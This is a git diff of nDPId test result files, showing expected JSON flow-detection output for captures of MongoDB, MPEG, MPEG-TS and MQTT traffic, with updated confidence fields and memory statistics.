+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1483814916005,"flow_last_seen":1483814916108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
+00813{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1483814916005,"flow_last_seen":1483814916108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":10,"midstream":0,"ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}}
 00156{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","total-events-serialized":32}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 27/27
@@ -38,10 +38,10 @@
 ~~ total active/idle flows...: 5/5
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4602460 bytes
-~~ total memory freed........: 4602460 bytes
-~~ total allocations/frees...: 99593/99593
+~~ total memory allocated....: 4686101 bytes
+~~ total memory freed........: 4686101 bytes
+~~ total allocations/frees...: 101183/101183
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 161 chars
-~~ json string max len.......: 709 chars
-~~ json string avg len.......: 499 chars
+~~ json string max len.......: 818 chars
+~~ json string avg len.......: 548 chars
diff --git a/test/results/mpeg.pcap.out b/test/results/mpeg.pcap.out
index b2afaceb9..65e4608bb 100644
--- a/test/results/mpeg.pcap.out
+++ b/test/results/mpeg.pcap.out
@@ -3,9 +3,9 @@
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1434379491040,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1434379491040,"pkt":"yGyHABajPBXCt3IOCABFAABAOE9AAEAGJUTAqFCgLmWdd9n8AFBP68YoAAAAALAC\/\/\/OTgAAAgQFtAEDAwUBAQgKFSiGAAAAAAAEAgAA"}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1434379491117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1434379491117,"pkt":"PBXCt3IOyGyHABajCABFAAA8AABAADIGa5cuZZ13wKhQoABQ2fyPIjpcT+vGKaAScSAIFwAAAgQFqAQCCAoAu5vaFSiGAAEDAwhf8g=="}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1434379491117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1434379491117,"pkt":"yGyHABajPBXCt3IOCABFAAA02wVAAEAGgpnAqFCgLmWdd9n8AFBP68YpjyI6XYAQECCXiwAAAQEIChUohk0Au5va"}
-00740{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1434379491040,"flow_last_seen":1434379491117,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1434379491117,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.ntop","breed":"Safe","category":"Network"},"http": {"hostname":"luca.ntop.org","url":"luca.ntop.org\/0.mp3","code":0,"content_type":"","user_agent":"Wget\/1.16.3 (darwin14.1.0)"}}
-00762{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1434379491040,"flow_last_seen":1434379491158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"ts_msec":1434379491158,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.ntop","breed":"Safe","category":"Media"},"http": {"hostname":"luca.ntop.org","url":"luca.ntop.org\/0.mp3","code":200,"content_type":"audio\/mpeg","user_agent":"Wget\/1.16.3 (darwin14.1.0)"}}
-00645{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":19,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1434379491040,"flow_last_seen":1434379491221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":9363,"flow_avg_l4_payload_len":492,"midstream":0,"ts_msec":1434379491221,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.ntop","breed":"Safe","category":"Media"}}
+00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1434379491040,"flow_last_seen":1434379491117,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1434379491117,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Network"},"http": {"hostname":"luca.ntop.org","url":"luca.ntop.org\/0.mp3","code":0,"content_type":"","user_agent":"Wget\/1.16.3 (darwin14.1.0)"}}
+00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1434379491040,"flow_last_seen":1434379491158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"ts_msec":1434379491158,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Media"},"http": {"hostname":"luca.ntop.org","url":"luca.ntop.org\/0.mp3","code":200,"content_type":"audio\/mpeg","user_agent":"Wget\/1.16.3 (darwin14.1.0)"}}
+00671{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":19,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1434379491040,"flow_last_seen":1434379491221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":9363,"flow_avg_l4_payload_len":492,"midstream":0,"ts_msec":1434379491221,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Media"}}
 00152{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":19,"source":"mpeg.pcap","alias":"nDPId-test","total-events-serialized":9}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 19/19
@@ -15,10 +15,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4595438 bytes
-~~ total memory freed........: 4595438 bytes
-~~ total allocations/frees...: 99575/99575
+~~ total memory allocated....: 4680391 bytes
+~~ total memory freed........: 4680391 bytes
+~~ total allocations/frees...: 101165/101165
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 157 chars
-~~ json string max len.......: 767 chars
-~~ json string avg len.......: 525 chars
+~~ json string max len.......: 793 chars
+~~ json string avg len.......: 537 chars
diff --git a/test/results/mpegts.pcap.out b/test/results/mpegts.pcap.out
index d97e4374f..1449616e0 100644
--- a/test/results/mpegts.pcap.out
+++ b/test/results/mpegts.pcap.out
@@ -1,8 +1,8 @@
 00438{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"mpegts.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mpegts.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435209297954,"flow_last_seen":1435209297954,"flow_idle_time":180000,"flow_min_l4_payload_len":1316,"flow_max_l4_payload_len":1316,"flow_tot_l4_payload_len":1316,"flow_avg_l4_payload_len":1316,"midstream":0,"ts_msec":1435209297954,"l3_proto":"ip4","src_ip":"10.1.16.48","dst_ip":"230.200.201.23","src_port":40737,"dst_port":1234,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mpegts.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1435209297954,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1362,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1362,"pkt_l4_len":1324,"ts_msec":1435209297954,"pkt":"AQBeSMkXrPHfGMSBgQANHwgARQAFQAAAQAAHEaScCgEQMObIyRefIQTSBSxl6UcBARcAD7wd249nI5BqMCydEQCD1YeFyAwoYGMeHIwcYCWAHEkET\/taR\/5YANOTSagKaodBkABeSU4ooP2cAgISCfI7GswCLhYGUDAuoQXALotIDoDAaSxnQetyw1wSf\/AKkMmAETWkokF4lgj\/+lAZSgnOA6QAiGVAYA8goTB50WWTRpqMHIxOOJ8\/G9fR\/gRwAyKEkesyBkAB8oyaCwrrgKE0mAZ74p+4IoA5RfCyWS8HBk6egclHP3xARwEBGEEXVAcUcasfHBwWuxBEA0AR3\/itnAslgP4YRyyuCUAHIGOdlcBl0VAUgAPrJ4fANDAD4iy\/w8TBHHBQGqzAH4UZAHtGCiNQgPA1JISSwngX6AHm4Jf\/mKVIQhIaSD8CMAMGBoJf\/aEdACJNQ4OIkGi0bLH9Meczk8i+AAAAAQ4ShEUQIiWUxLGqxZhYCkaHcmBJHgFBLPZRvGhAjlBpCLwBHUOLiXyWkJ41IhP4BH1T\/uSXFhIJn\/tHAQEZ0kepcDEADUYFzAA1cjMHnioWBMyEDwGRt7NwM5CBuOLJQCnAKi98MAR7oiygHZNJiEoKSG4lmBgaTAxKQSf+iYWQguoQIAGwERxFmI3UAusNyXAUqSlbJ5X4WGOUAQUpObs+A8kBs4JQAaEE6oSWAdQMP\/9ghf9DiGSh5LAYDApaSdFFANnYrBjoHYtBPLLKRUBQDgP0DT\/\/ORgDyJQaGBg0vAKAK8BxyZ0AZ4JIBBDDOFjeKiGBUEcBARooBUCpMQWTeQxgYA46QHYBoSgCIhAOgHYCcAhDKgLuTwFgEYGcAGAZAG8AmQkA1JqS0AOwG5KwBKBQAa\/Alf+AOvwSQA\/sLgKAB+GoBCAGJrko0b0gVRwSf9QHYDoNQCQAIMqMFwDWAfgQnBg\/\/mSg85hwCgAiQkoDIXkxWGAeSTGBGAFG4YCT\/6WQ+AQpqEegNiL\/GrDRqRZackiI5OrlAZ43r4E0jenh7oKAIKjCCsBbeNw5Yo42RwEBGwAfQcAcRNBC\/5Z3JpRQI\/\/QCAlBZTk2chBKACsMQM4Iv\/Q0sAiADYCqACG5YMNXMdDDQLDOOlKiWGYBLwLsCN\/1yL7bI7FfbAAoJBHItxAyYj9CFdLCexAmGGF7vB7MBLz9L5WGDsERwDwKSQJIfcYImKe4c7uIjWFSGKP7CWSAC2zwgfUBhAEzwVP\/g6IJ5OIEAD+DAC0NAQgh\/9kMhk0B1uxSAKllJDAEQYAZFAUAQgk\/+DYh9IBHH\/8Q\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/0cf\/xD\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/"}
-00605{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"mpegts.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435209297954,"flow_last_seen":1435209297954,"flow_idle_time":180000,"flow_min_l4_payload_len":1316,"flow_max_l4_payload_len":1316,"flow_tot_l4_payload_len":1316,"flow_avg_l4_payload_len":1316,"midstream":0,"ts_msec":1435209297954,"l3_proto":"ip4","src_ip":"10.1.16.48","dst_ip":"230.200.201.23","src_port":40737,"dst_port":1234,"l4_proto":"udp","ndpi": {"proto":"MPEG_TS","breed":"Fun","category":"Media"}}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"mpegts.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1435209297954,"flow_last_seen":1435209297954,"flow_idle_time":180000,"flow_min_l4_payload_len":1316,"flow_max_l4_payload_len":1316,"flow_tot_l4_payload_len":1316,"flow_avg_l4_payload_len":1316,"midstream":0,"ts_msec":1435209297954,"l3_proto":"ip4","src_ip":"10.1.16.48","dst_ip":"230.200.201.23","src_port":40737,"dst_port":1234,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MPEG_TS","breed":"Fun","category":"Media"}}
+00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"mpegts.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435209297954,"flow_last_seen":1435209297954,"flow_idle_time":180000,"flow_min_l4_payload_len":1316,"flow_max_l4_payload_len":1316,"flow_tot_l4_payload_len":1316,"flow_avg_l4_payload_len":1316,"midstream":0,"ts_msec":1435209297954,"l3_proto":"ip4","src_ip":"10.1.16.48","dst_ip":"230.200.201.23","src_port":40737,"dst_port":1234,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MPEG_TS","breed":"Fun","category":"Media"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"mpegts.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1435209297954,"flow_last_seen":1435209297954,"flow_idle_time":180000,"flow_min_l4_payload_len":1316,"flow_max_l4_payload_len":1316,"flow_tot_l4_payload_len":1316,"flow_avg_l4_payload_len":1316,"midstream":0,"ts_msec":1435209297954,"l3_proto":"ip4","src_ip":"10.1.16.48","dst_ip":"230.200.201.23","src_port":40737,"dst_port":1234,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MPEG_TS","breed":"Fun","category":"Media"}}
 00153{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"mpegts.pcap","alias":"nDPId-test","total-events-serialized":6}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 1/1
@@ -12,9 +12,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4594858 bytes
-~~ total memory freed........: 4594858 bytes
-~~ total allocations/frees...: 99554/99554
+~~ total memory allocated....: 4679811 bytes
+~~ total memory freed........: 4679811 bytes
+~~ total allocations/frees...: 101144/101144
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 158 chars
 ~~ json string max len.......: 2715 chars
diff --git a/test/results/mqtt.pcap.out b/test/results/mqtt.pcap.out
new file mode 100644
index 000000000..8bbb93349
--- /dev/null
+++ b/test/results/mqtt.pcap.out
@@ -0,0 +1,27 @@
+00436{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"mqtt.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
+00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643014009283,"flow_last_seen":1643014009283,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1643014009283,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1643014009283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1643014009283,"pkt":"AAAAAAAAAAwATSywCABFAAA8AABAADQGcggKCgoBwKgAAQdbo6QZpJjZwwPwU6AS\/oijvAAAAgQFtAQCCArcK3DSu1+3wwEDAwc="}
+00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1643014009286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":132,"pkt_l4_len":98,"ts_msec":1643014009286,"pkt":"AAAAAAAAAAwATSywCABFAAB2fFxAAD8G6nHAqAABCgoKAaOkB1vDA\/BTGaSY2oAYAOXxcQAAAQEICrtfuBTcK3DSEEAABk1RSXNkcAPCABQAFmNiYWFiY2JhYmFjYmJiYmJhYWFhYWIADDAyRDUwNTAyMjNEMwAMMDJENTA1MDIyM0Qz"}
+00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643014009283,"flow_last_seen":1643014009286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1643014009286,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
+00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1643014009367,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"ts_msec":1643014009367,"pkt":"AAAAAAAAAAwATSywCABFAABUfF1AAD8G6pLAqAABCgoKAaOkB1vDA\/CVGaSY2oAYAOUsbgAAAQEICrtfuGXcK3Ejgh4AAQAZYXN0ci9zNzIwLzAyRDUwNTAyMjNEMy85OQA="}
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
+00845{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1643014349216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":355,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":355,"pkt_l4_len":317,"ts_msec":1643014349216,"pkt":"AAAAAAAAAAIAAAAIgQAD8AgARQABUdTzQABABowKZEMj7jOJHO+I2wdbWSC31VrTd7uAGAGz9SgAAAEBCAoAXWNEhxKKyRCaAgAETVFUVATAAlgAEFA0Nzc3NUlEMTcwVzIxMjAASmlvdGF6ZXdwbWxpdGh1Yi5henVyZS1kZXZpY2VzLm5ldC9QNDc3NzVJRDE3MFcyMTIwLz9hcGktdmVyc2lvbj0yMDE4LTA2LTMwALBTaGFyZWRBY2Nlc3NTaWduYXR1cmUgc2lnPUtVNFVpQlRmV2UlMkZ4cyUyQmdURzVXUURMdnpyUHg0VTYySFRwU2xma2Z4cmZRJTNEJnNlPTE2NDMwMTc5NDcmc3I9aW90YXpld3BtbGl0aHViLmF6dXJlLWRldmljZXMubmV0JTJGUDQ3Nzc1SUQxNzBXMjEyMCUyRiUzRmFwaS12ZXJzaW9uJTNEMjAxOC0wNi0zMA=="}
+00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
+00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1643014009283,"flow_last_seen":1643014010972,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":392,"flow_tot_l4_payload_len":590,"flow_avg_l4_payload_len":73,"midstream":0,"ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
+00152{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","total-events-serialized":12}
+~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
+~~ packets captured/processed: 9/9
+~~ skipped flows.............: 0
+~~ total layer4 data length..: 875 bytes
+~~ total detected protocols..: 2
+~~ total active/idle flows...: 2/2
+~~ total timeout flows.......: 0
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+~~ total memory allocated....: 4680915 bytes
+~~ total memory freed........: 4680915 bytes
+~~ total allocations/frees...: 101155/101155
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+~~ json string min len.......: 157 chars
+~~ json string max len.......: 850 chars
+~~ json string avg len.......: 570 chars
diff --git a/test/results/mssql_tds.pcap.out b/test/results/mssql_tds.pcap.out
index a2832eeee..b57f88aa3 100644
--- a/test/results/mssql_tds.pcap.out
+++ b/test/results/mssql_tds.pcap.out
@@ -1,23 +1,23 @@
